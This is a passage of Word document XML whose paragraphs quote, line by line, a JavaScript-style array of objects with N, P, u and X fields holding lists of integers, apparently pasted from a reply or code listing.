        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BA61E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630B5DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE1835" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B38E2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B626E41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C6AB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 26, 66, 160]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505A8D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A53AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D940C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40971B30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAD4CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C2D0E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D527AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FF80F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC139E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524968C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65451545" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DF1C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17402BFE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E46F91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98BB4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275690EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02BC06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F4098B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1F11C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F90769" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E0902" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 14, 23, 40, 219, 249, 277, 282, 283, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC5E99" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015621BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60587FB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E284A3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB46199" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6510EBD8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55349F53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED11588" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [59, 112, 127, 249, 279, 282, 283, 327, 344, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633EF34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C6DD6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEA3AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A0422" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 19, 159, 186, 317, 338]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D4F7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF3EA9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13A17A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226951F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D338AE5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D645BB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F644E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557E2AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FAE43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED08A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277186A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49474693" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [150, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B5F0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A53E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1D17B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E5299" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 5, 8, 19, 51, 92, 100, 111, 148, 163, 169, 196, 208, 290, 309, 328, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023752D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52FEAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0085E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D5644" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [261]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8351C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E45E42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110101A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8A720" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57205974" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14A776" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669180F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCC826" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53272555" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD00B51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EE950" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D594F18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C2BEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E05A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DAC5DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E550A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [27, 28, 106, 140, 267]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5303D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5F56F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65B058" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572ACDC0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 7, 9, 14, 23, 219, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202417EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B64BB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23829D6B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDDCB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6990A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF42A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C5D99" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FB67B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B88F36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5ACE47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A85474" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCDE19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [229]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A15DF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9DBFF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D94EC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFF40C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17323C57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41901F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742F025" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E039116" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 6, 7, 8, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1C412" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552BC087" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [16, 13, 4, 12, 5, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85DAA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2209D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [60, 159, 168, 186, 220, 245, 272, 285, 311, 317, 338, 348, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF65E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255513A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDED09E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF62207" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 16, 18, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26843E36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A536506" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5774FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FF7A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BE700" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619F373" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D2D68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3FC8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C53D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56081AF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE7B3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA1439" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376925E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9FAD1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377CF28" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56532A51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4, 6, 9, 10, 12, 13, 14, 17, 19, 90, 139, 159, 311, 317, 339]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8B37C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7724F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C191034" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F43A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 37, 147, 255]</w:t>
